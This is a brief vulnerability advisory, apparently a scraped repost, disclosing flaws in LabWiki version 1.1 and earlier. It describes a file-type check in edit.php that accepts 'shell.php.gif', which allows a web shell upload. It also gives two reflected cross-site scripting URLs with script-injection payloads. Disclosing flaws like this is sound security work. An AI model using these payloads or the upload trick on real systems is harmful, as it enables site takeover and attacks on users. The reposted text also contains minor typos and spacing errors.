------------------------------------------------------------------------
LabWiki <= 1.1 Multiple Vulnerabilities
------------------------------------------------------------------------
Author: muuratsalo (Revshell.com) www.2cto.com muuratsalo [at] gmail [dot] com
: Http://www.bioinformatics.org/phplabware/labwiki/index.php
[0x01] defect Overview:
All versions of LabWiki <= 1.1 has multiple defects
[0x03] defects:
-- Shell upload --
The upload script/edit. php improperly checks the filetype of uploaded images.
A 'shell.php.gif 'is accepted./* -- note that access to edit. php cocould be restricted --*/
-- Multiple Cross Site Scripting --
Http://www.bkjia.com/LabWiki/index. php? From = "> </> <script> alert ('muuratsalo') </script> & help = true & page = What_is_wiki
Http://www.bkjia.com/LabWiki/recentchanges. php? Nothing = nothing & page_no = "> </> <script> alert ('muuratsalo') </script>